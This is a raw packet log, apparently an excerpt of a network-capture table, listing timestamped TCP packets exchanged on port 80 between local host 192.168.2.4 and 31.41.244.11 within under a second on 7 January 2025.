Jan 7, 2025 10:09:02.228291035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228302956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228313923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228379965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.228908062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228950024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228965998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228966951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.228979111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228990078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.229017019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.229029894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.229067087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.229079962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.229116917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.229152918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260516882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260529041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260540962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260584116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260608912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260621071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260631084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260639906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260643959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260657072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260678053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260678053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260704041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260721922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260734081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260746002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260756969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260787010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260859013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260869980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.260899067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.260926008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.265341997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265353918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265364885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265376091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265387058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265398026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265409946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.265458107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.265458107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.286957979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.286976099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.286986113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287010908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.287025928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287045956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287050962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.287059069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287082911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287091970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.287091970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.287092924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287105083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.287130117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.287146091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.312927008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.312944889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.312956095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.312982082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.312993050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.312999010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313019037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313050032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313091040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313092947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313107014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313117981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313133955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313143969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313154936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313167095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313169956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313213110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313213110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313231945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313242912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313255072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313266039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313287973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313322067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313332081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313340902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313342094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313342094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313352108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313389063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313397884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313407898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313417912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313422918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313438892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313446045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313450098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313496113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313496113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313517094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313527107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313541889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313551903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313553095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313553095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313564062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313575029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313591003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313596964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313608885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313617945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313673019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313703060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313713074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313723087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313731909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313741922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313765049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313770056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313803911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313816071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313833952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313836098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313842058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313848972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313877106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313909054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313916922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313925028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313936949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313950062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313961029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.313966036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313966036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.313971996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314018011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314018011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314202070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314212084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314223051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314233065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314243078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314253092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314269066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314273119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314284086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314295053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314305067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314306021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314306021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314316988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314326048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314336061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314348936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314352036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314371109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314385891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314409971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314457893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314481974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314502001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314503908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314512014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314518929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314522982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314527988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314553022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314587116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314615965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314857960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314868927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314881086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314891100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314901114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314908981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314929008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.314954996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314966917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314975023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.314992905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.315012932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.315676928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315687895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315696955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315717936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315726995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315737963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315742970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.315773010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315787077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.315792084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.315830946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347261906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347306967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347322941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347343922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347354889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347368956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347407103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347417116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347419024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347430944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347457886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347474098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347568035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347579956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347595930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347605944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347616911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347626925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.347655058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.347670078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.351927042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.351938009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.351955891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.351967096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.351983070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.352010965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.352022886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.352035046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.352046013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.352055073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.352072001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.352104902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.373848915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373867989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373887062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373898029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373908997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373914003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373919964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373923063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.373951912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.373986006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.374000072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.399667025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399677038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399729967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399740934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399755955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399808884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.399833918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399844885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399856091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399919033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399931908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399941921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399954081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399964094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.399982929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.399982929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.399997950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400012016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400023937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400033951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400090933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400114059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400130033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400141954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400152922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400160074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400193930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400230885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400233030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400245905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400255919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400266886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400290966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400310040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400321960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400336981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400430918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400441885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400453091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400463104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400473118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400479078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400484085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400495052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400509119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400522947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400533915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400535107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400553942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400579929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400603056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400612116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400614977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400626898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400676012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400744915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400755882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400765896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400777102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400788069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400799036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400804043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400829077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400859118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400888920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400899887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400906086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400911093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400948048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400954962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.400959969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400970936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400980949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.400996923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401031971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401093960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401103973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401114941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401129961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401141882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401153088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401160955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401165009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401191950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401191950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401218891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401226997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401242971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401253939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401264906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401309967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401441097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401452065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401462078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401472092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401482105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401493073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401503086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401510000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401514053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401531935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401561022 CET	80	50017	31.41.244.11	192.168.2.4
